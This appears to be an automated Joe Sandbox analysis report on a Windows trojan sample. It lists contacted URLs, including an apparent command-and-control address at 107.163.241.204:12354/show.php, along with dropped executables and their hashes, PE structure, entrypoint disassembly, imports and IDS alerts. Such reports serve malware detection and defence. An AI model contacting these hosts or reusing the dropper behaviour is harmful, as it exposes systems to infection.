                                            http://blog.sina.com.cn/u/5655029807rundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://107.163.241.204:12354/show.php(rundll32.exe, 00000006.00000003.2221907978.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://107.163.241.204:12354/show.phphrundll32.exe, 00000006.00000003.2423080539.0000000005B33000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://107.163.24Irundll32.exe, 00000006.00000002.3807350725.0000000004EEB000.00000004.00000010.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://107.163.241.204:12354/show.php)rundll32.exe, 00000006.00000002.3807350725.0000000004EEB000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3808953016.0000000004F6D000.00000004.00000010.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://blog.sina.com.cn/u/5655029807Irundll32.exe, 00000006.00000003.1693230405.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1653072832.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://107.163.241.204:12354/show.php#rundll32.exe, 00000006.00000002.3811115013.0000000005B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://107.163.241.204:12354/show.phpcrundll32.exe, 00000006.00000003.1693230405.0000000000D2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://blog.sina.com.cn/u/5655029807Arundll32.exe, 00000006.00000003.2422920583.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://107.163.241.204:12354/show.php%rundll32.exe, 00000006.00000003.3031858000.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2221907978.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3031593454.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2422920583.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://blog.sina.com.cn/u/5655029807Brundll32.exe, 00000006.00000003.1693230405.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1653072832.0000000000D0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://blog.sina.com.cn/rundll32.exe, 00000006.00000002.3803023615.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://107.163.241.204:12354/show.phpgrundll32.exe, 00000006.00000002.3811115013.0000000005B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      202.108.0.52
                                                      		blogx.sina.com.cnChina
                                                      		4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                                                      107.163.241.204
                                                      		unknownUnited States
                                                      		20248TAKE2UStrue

                                                      Private

                                                      IP
                                                      127.0.0.1

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1573195
                                                      Start date and time:2024-12-11 16:22:51 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 37s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:20
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:XgijTrY6No.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:02e18916d32cb641ad472bf835fa86d6a62b8e86f8838f062fd46cb4b88ccced.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@22/3@51/3
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 70
                                                      • Number of non-executed functions: 72
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: XgijTrY6No.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      10:23:47API Interceptor629286x Sleep call for process: rundll32.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      202.108.0.52VqCbf9fhnQ.exeGet hashmaliciousUnknownBrowse
                                                      • blog.sina.com.cn/u/5655029807
                                                      k4F4uRTZZR.dllGet hashmaliciousUnknownBrowse
                                                      • blog.sina.com.cn/u/5655029807
                                                      5jme4p7u76.exeGet hashmaliciousUnknownBrowse
                                                      • blog.sina.com.cn/u/5655029807

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      s-part-0035.t-0009.t-msedge.netcloudflare.msiGet hashmaliciousDanaBotBrowse
                                                      • 13.107.246.63
                                                      discord.exeGet hashmaliciousUnknownBrowse
                                                      • 13.107.246.63
                                                      Document.xlaGet hashmaliciousUnknownBrowse
                                                      • 13.107.246.63
                                                      Message_2713712.emlGet hashmaliciousUnknownBrowse
                                                      • 13.107.246.63
                                                      FreebieNotes.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 13.107.246.63
                                                      xeroxscan.DocxGet hashmaliciousUnknownBrowse
                                                      • 13.107.246.63
                                                      xeroxscan.DocxGet hashmaliciousUnknownBrowse
                                                      • 13.107.246.63
                                                      xeroxscan.DocxGet hashmaliciousUnknownBrowse
                                                      • 13.107.246.63
                                                      https://www.officested.com/eur/14cb4ab4-62b8-45a2-a944-e225383ee1f9/bbd2fe64-a7e1-4036-87ed-fa296dec6eb4/3966c028-c5bc-45c3-932e-642ccbdd8bca/login?id=Zjc0eUxaVU1jVElZSFBZVWJoQXgrZGErVWw5TzBLNllUbTV2WGJKbjRIbk00VFJpTUxwZzJJWnZ2dnBXZjVyYldlWk9NOTQ4WGViVXUzUkI3TmFGdXhRQU9kWDdUUlFXRnlMaUdhZWVuVE9tdnc5bjFNaWs1M1ozTkRnUldwUHdHQ2gzNmRGTDZUM0pkbVExc2Vxa05lWExvQU5WZTFibEpLeXJwM0RIYWJKUjkrWlBZNU5DRUFuTzc0dEZVb2tyOUlxMkVRK0pHSEllMFZLZkJTSXorK2Nady9WcmlFRUJVRkFZRXFrRkhmQ3pPTktuS2djQkVyQ2krUWpEZGlBY2ZCUi9neElRTFVINExCdkNIeVc1bXROSlNLaW9YYUlkWGZ4aFVDSVlIME5VMjY5MUQwRzd1cXBsSEpsZWYyR0pWaUdVdi9wZ3pHckJoK3FCNDRxN3huQzhhVXY5WU5PcWpoRDdDU3FZUWtUWDg2amJyWjQ0ZHhhOGprZGZUU0czOWhHaEFjZnhCR0JRdGlzVUp5ZVJqSmtSOWtvRE90VWp2SWJMb1VUNWpvTT0Get hashmaliciousHTMLPhisherBrowse
                                                      • 13.107.246.63
                                                      blogx.sina.com.cn08e2VwqyI0.dllGet hashmaliciousUnknownBrowse
                                                      • 202.108.0.52
                                                      PqZ6GU98Eh.dllGet hashmaliciousUnknownBrowse
                                                      • 202.108.0.52
                                                      jYAKmjIPgI.dllGet hashmaliciousUnknownBrowse
                                                      • 202.108.0.52
                                                      b3sV534MMf.dllGet hashmaliciousUnknownBrowse
                                                      • 202.108.0.52
                                                      NaRZIOq3O8.dllGet hashmaliciousUnknownBrowse
                                                      • 202.108.0.52
                                                      33twe7X26S.dllGet hashmaliciousUnknownBrowse
                                                      • 202.108.0.52
                                                      MYuRWuVXzX.dllGet hashmaliciousUnknownBrowse
                                                      • 202.108.0.52
                                                      yKVQVNB2qI.dllGet hashmaliciousUnknownBrowse
                                                      • 202.108.0.52
                                                      gmqIbj35WF.dllGet hashmaliciousUnknownBrowse
                                                      • 202.108.0.52
                                                      81mieek02V.dllGet hashmaliciousUnknownBrowse
                                                      • 202.108.0.52

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CHINA169-BJChinaUnicomBeijingProvinceNetworkCNJosho.ppc.elfGet hashmaliciousUnknownBrowse
                                                      • 123.121.0.198
                                                      Josho.mpsl.elfGet hashmaliciousUnknownBrowse
                                                      • 124.192.197.161
                                                      Josho.mips.elfGet hashmaliciousUnknownBrowse
                                                      • 114.67.239.168
                                                      hax.x86.elfGet hashmaliciousMiraiBrowse
                                                      • 221.222.118.76
                                                      hax.ppc.elfGet hashmaliciousMiraiBrowse
                                                      • 140.210.138.192
                                                      .5r3fqt67ew531has4231.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                      • 103.135.163.78
                                                      rebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 122.113.109.82
                                                      rebirth.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 123.126.198.111
                                                      rebirth.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 116.218.224.190
                                                      la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                      • 161.207.226.55
                                                      TAKE2US08e2VwqyI0.dllGet hashmaliciousUnknownBrowse
                                                      • 107.163.56.110
                                                      PqZ6GU98Eh.dllGet hashmaliciousUnknownBrowse
                                                      • 107.163.56.110
                                                      jYAKmjIPgI.dllGet hashmaliciousUnknownBrowse
                                                      • 107.163.56.110
                                                      b3sV534MMf.dllGet hashmaliciousUnknownBrowse
                                                      • 107.163.56.110
                                                      NaRZIOq3O8.dllGet hashmaliciousUnknownBrowse
                                                      • 107.163.241.193
                                                      33twe7X26S.dllGet hashmaliciousUnknownBrowse
                                                      • 107.163.241.193
                                                      MYuRWuVXzX.dllGet hashmaliciousUnknownBrowse
                                                      • 107.163.56.110
                                                      JwLT3elUtn.dllGet hashmaliciousUnknownBrowse
                                                      • 107.163.43.161
                                                      yKVQVNB2qI.dllGet hashmaliciousUnknownBrowse
                                                      • 107.163.56.240
                                                      46PhJ3XpBT.dllGet hashmaliciousUnknownBrowse
                                                      • 107.163.43.236

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      37f463bf4616ecd445d4a1937da06e19nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                      • 202.108.0.52
                                                      CcIlKT6XdC.exeGet hashmaliciousAmadey, PureLog Stealer, Stealc, VidarBrowse
                                                      • 202.108.0.52
                                                      PO_11100011211.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                      • 202.108.0.52
                                                      Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 202.108.0.52
                                                      DOCUMENT#5885588@081366(766.pdf.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 202.108.0.52
                                                      Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                      • 202.108.0.52
                                                      LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                      • 202.108.0.52
                                                      SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                      • 202.108.0.52
                                                      http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                      • 202.108.0.52
                                                      EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                      • 202.108.0.52

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\1.txt

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):2175
                                                      Entropy (8bit):4.345606928537238
                                                      Encrypted:false
                                                      SSDEEP:24:8DHNxDLOY1Jan3LzVzao6jzonQlxMnHODiOSGLdjMrGg6Wz7mUzHt0N3Cdkg4Cn0:53tOYQUVnz7zHtJkGTo
                                                      MD5:4F8457524B04E8E471135A01335692C8
                                                      SHA1:EE293ADFDDFB8F2900EA4878CAB7F457C9BB00E1
                                                      SHA-256:0EC2450D39F77FE563889014E82AB4B6F5ACD0AA81CA4BC23B4913ADFCEBE2D3
                                                      SHA-512:6C462501059F334FEE871AD47585E11A945DFAF5E920DFDC44E5C373B9C3CD3250B165E067195A35EEB3EED24FAA854CBF0049F604B018F804E63A4DF752C108
                                                      Malicious:false
                                                      Preview:..2024-12-11 13:50..iOffset....2024-12-11 16:06..iOffset....2024-12-11 19:29..iOffset....2024-12-11 20:56..iOffset....2024-12-11 23:17..iOffset....2024-12-12 02:51..iOffset....2024-12-12 04:33..iOffset....2024-12-12 09:27..iOffset....2024-12-12 13:16..iOffset....2024-12-12 17:00..iOffset....2024-12-12 20:48..iOffset....2024-12-12 23:15..iOffset....2024-12-13 04:15..iOffset....2024-12-13 06:24..iOffset....2024-12-13 11:25..iOffset....2024-12-13 16:52..iOffset....2024-12-13 20:15..iOffset....2024-12-14 04:14..iOffset....2024-12-14 07:50..iOffset....2024-12-14 18:15..iOffset....2024-12-15 00:54..iOffset....2024-12-15 17:11..iOffset....2024-12-16 02:10..iOffset....2024-12-18 16:56..iOffset....2024-12-19 14:44..iOffset....2024-12-20 01:18..iOffset....2024-12-20 22:11..iOffset....2025-05-26 23:47..iOffset....2025-07-27 08:08..iOffset....2025-08-13 13:44..iOffset....2025-09-24 09:00..iOffset....2025-11-09 03:42..iOffset....2025-12-15 17:35..iOffset....2025-12-31 13:18..iOffset....2026-01-26 2

                                                      C:\Users\user\AppData\Local\Temp\mszcy.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\XgijTrY6No.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                      Category:dropped
                                                      Size (bytes):87764
                                                      Entropy (8bit):6.839765003056181
                                                      Encrypted:false
                                                      SSDEEP:1536:8gDktLw4rO10tMrlk3SJDlf98jqP+8il3CxOeZIckWlmypQ:uLRrO10TiJD9yjqrilyxOuPpQ
                                                      MD5:847CCE07E3BF3D974D1D089F5028E95F
                                                      SHA1:AD360C293D76F4566445B971E219E3BC5A51AB2D
                                                      SHA-256:C8BE6A496ACED8BC88340EBB357327701E6A9777821A3F1C5ABE3A9C5880170A
                                                      SHA-512:C2A40CD3E2C081F1F23956CE58185F65E203A31A07AB3A48509161E7540E9E1E3030D3F8FFC55B80C1A96654A74CAF2DF7A2B5AA5502BA1F3BC467E070392F6B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........x...x...x...%...x...v...x.v.r...x.v.|...x...y.S.x.v.s...x.&.~...x.Rich..x.PE..L...~..U.................0.........."/.......@....@..........................p..............................................HM.......p.......................O.......................................................................................text....0.......$.................. ..`.rdata... ...@.......(..............@..@.data........`.......>..............@....rsrc........p.......D..............@..@.CG...... ...@......................`....adata.......`.......(..............@...................................................................................................................................................................................................................................................................................................................

                                                      C:\ftelcs\rjqzr.dll

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\mszcy.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                      Category:dropped
                                                      Size (bytes):45576
                                                      Entropy (8bit):7.865404631369311
                                                      Encrypted:false
                                                      SSDEEP:768:DICzePjle2367kjhrXLdCuYMW8QVnwrLDGe/brbtJyOTuXfADVjeJ2i/MVJWAE:DDePjA23Ukjh37YMonwrvGybrbbRCf4E
                                                      MD5:0F12A7D509B2C9BB9B4CD6D8A0325E86
                                                      SHA1:F5FB59AD4F0633D115B06F35A2DC161DC4367157
                                                      SHA-256:9111C1EB1F0B59DCD49CFD5A0ABC0BA100AC59A3BCAE8623FF091DFDC46FED3C
                                                      SHA-512:E3C84A643FF0A2627DABA8A056221985A472AAF07BADE61B3E9459DB4BFC8792C1347606911E3FCC01581508004B18B5435BCCCD5E7617CC6D091F37A5F42E7F
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 68%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[v.2...a...a...ad..a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...aRich...a........PE..L....v.U...........!................. ....... ..............................."......................................$...G....................................................................................................K.......................text...................PEC2........ ....rsrc............................... ....reloc..............................@...GDR.......... ............C..W...... ............................................rsrc...b.......b................... ...................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                      Entropy (8bit):6.834600080669012
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:XgijTrY6No.exe
                                                      File size:87'284 bytes
                                                      MD5:fc2914434d6121f5e04e8e70e235c239
                                                      SHA1:2cb4237f4c0db11c3b6d80b54c9148daeccfeed6
                                                      SHA256:02e18916d32cb641ad472bf835fa86d6a62b8e86f8838f062fd46cb4b88ccced
                                                      SHA512:27322da544de7d7d1d676edc5dd8dadbdf3e8af0936e6a99b307abc1990df00ec3ae18ef63625929b2935abe3dbb75f51782c5e6fc2b47f894a0ae820065a8f4
                                                      SSDEEP:1536:8gDktLw4rO10tMrlk3SJDlf98jqP+8il3CxOeZIckWlmypV:uLRrO10TiJD9yjqrilyxOuPpV
                                                      TLSH:2983BE5DBD93886ED0018B3547578725E6B2AC19F9314F334350FA1DAF3690BEED9288
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............x...x...x...%...x...v...x.v.r...x.v.|...x...y.S.x.v.s...x.&.~...x.Rich..x.PE..L...~..U.................0.........."/.....

                                                      File Icon

                                                      Icon Hash:f0bb9b9b9b9bfe7d

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x402f22
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                      DLL Characteristics:
                                                      Time Stamp:0x55F8F97E [Wed Sep 16 05:09:18 2015 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:7149be53ab0cc890706cc958454a7873

                                                      Entrypoint Preview

                                                      Instruction
                                                      push ebp
                                                      mov ebp, esp
                                                      push FFFFFFFFh
                                                      push 00404AD8h
                                                      push 00402F10h
                                                      mov eax, dword ptr fs:[00000000h]
                                                      push eax
                                                      mov dword ptr fs:[00000000h], esp
                                                      sub esp, 68h
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      mov dword ptr [ebp-18h], esp
                                                      xor ebx, ebx
                                                      mov dword ptr [ebp-04h], ebx
                                                      push 00000002h
                                                      call dword ptr [00404268h]
                                                      pop ecx
                                                      or dword ptr [004066A8h], FFFFFFFFh
                                                      or dword ptr [004066ACh], FFFFFFFFh
                                                      call dword ptr [0040426Ch]
                                                      mov ecx, dword ptr [0040669Ch]
                                                      mov dword ptr [eax], ecx
                                                      call dword ptr [00404270h]
                                                      mov ecx, dword ptr [00406698h]
                                                      mov dword ptr [eax], ecx
                                                      mov eax, dword ptr [00404274h]
                                                      mov eax, dword ptr [eax]
                                                      mov dword ptr [004066A4h], eax
                                                      call 00007F5C28BDF188h
                                                      cmp dword ptr [00406590h], ebx
                                                      jne 00007F5C28BE0FDEh
                                                      push 004030A4h
                                                      call dword ptr [00404278h]
                                                      pop ecx
                                                      call 00007F5C28BE10BDh
                                                      push 00406020h
                                                      push 0040601Ch
                                                      call 00007F5C28BE10A8h
                                                      mov eax, dword ptr [00406694h]
                                                      mov dword ptr [ebp-6Ch], eax
                                                      lea eax, dword ptr [ebp-6Ch]
                                                      push eax
                                                      push dword ptr [00406690h]
                                                      lea eax, dword ptr [ebp-64h]
                                                      push eax
                                                      lea eax, dword ptr [ebp-70h]
                                                      push eax
                                                      lea eax, dword ptr [ebp-60h]
                                                      push eax
                                                      call dword ptr [00404280h]
                                                      push 00406018h
                                                      push 00406000h
                                                      call 00007F5C28BE1075h

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ C ] VS98 (6.0) build 8168
                                                      • [LNK] VS98 (6.0) imp/exp build 8168
                                                      • [C++] VS98 (6.0) build 8168
                                                      • [RES] VS98 (6.0) cvtres build 1720

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x4d480x8c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x70000xc8e4.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x14fb00x8.CG
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x30000x2400e5604bb5c441332166d846e4e0c49c2bFalse0.560546875COM executable for DOS6.036937988019541IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x40000x20000x1600fd41b19e9ec06f7b66492dc4ca23e649False0.34410511363636365data4.8504121264257725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x60000x10000x6003e4e842fedc9d2e7fe48ac505a51b4a8False0.2890625data2.9847726844923748IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x70000xd0000xc800cfaa119fa35a42ffce5c8d54d2130533False0.87822265625data7.677730986482495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .CG0x140000x20000x1c00769d77fbde7bb91d8e3ab6c16f4b01f1False0.5341796875data5.783383892628231IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .adata0x160000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      IMAGE0x748c0xb208dataChineseChina0.9606591188344743
                                                      RT_CURSOR0x126940x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                      RT_CURSOR0x127c80x134dataEnglishUnited States0.4642857142857143
                                                      RT_CURSOR0x128fc0x134dataEnglishUnited States0.4805194805194805
                                                      RT_CURSOR0x12a300x134dataEnglishUnited States0.38311688311688313
                                                      RT_CURSOR0x12b640x134dataEnglishUnited States0.36038961038961037
                                                      RT_CURSOR0x12c980x134dataEnglishUnited States0.4090909090909091
                                                      RT_CURSOR0x12dcc0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                      RT_ICON0x157140x368Device independent bitmap graphic, 16 x 32 x 24, image size 7680.40022935779816515
                                                      RT_ICON0x153ac0x368Device independent bitmap graphic, 16 x 32 x 24, image size 7680.4025229357798165
                                                      RT_GROUP_CURSOR0x135d00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                      RT_GROUP_CURSOR0x135e40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                      RT_GROUP_CURSOR0x135f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                      RT_GROUP_CURSOR0x1360c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                      RT_GROUP_CURSOR0x136200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                      RT_GROUP_CURSOR0x136340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                      RT_GROUP_CURSOR0x136480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                      RT_GROUP_ICON0x153980x14data1.25
                                                      RT_GROUP_ICON0x153840x14data1.1
                                                      RT_VERSION0x151240x260dataEnglishUnited States0.5723684210526315

                                                      Imports

                                                      DLLImport
                                                      MFC42.DLL
                                                      MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, _onexit, __dllonexit, strncpy, sprintf, strcpy, _ftol, _except_handler3, memset, memcpy, srand, rand, _setmbcp, __CxxFrameHandler, _EH_prolog, __p___argv, _controlfp
                                                      KERNEL32.dllCreateFileA, ExitProcess, WinExec, WriteFile, GetTempPathA, Sleep, LockResource, SizeofResource, LoadResource, CreateProcessA, GetModuleFileNameA, ReadFile, FindResourceA, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, GetSystemTime, CreateThread, TerminateThread, GetModuleHandleA, GetStartupInfoA, DeleteFileA, CreateDirectoryA, CloseHandle, GetTickCount
                                                      USER32.dllDrawIcon, GetClientRect, GetSystemMetrics, IsIconic, GetSystemMenu, wsprintfA, EnableWindow, SendMessageA, LoadIconA, AppendMenuA
                                                      GDI32.dllCreateSolidBrush, DeleteObject
                                                      WS2_32.dllsetsockopt, WSAIoctl, htons, gethostbyname, gethostname, socket, inet_ntoa, ntohl, ntohs, WSACleanup, WSAStartup, closesocket, recv, WSAGetLastError, bind

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      ChineseChina
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-12-11T16:23:53.890560+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949751107.163.241.20412354TCP
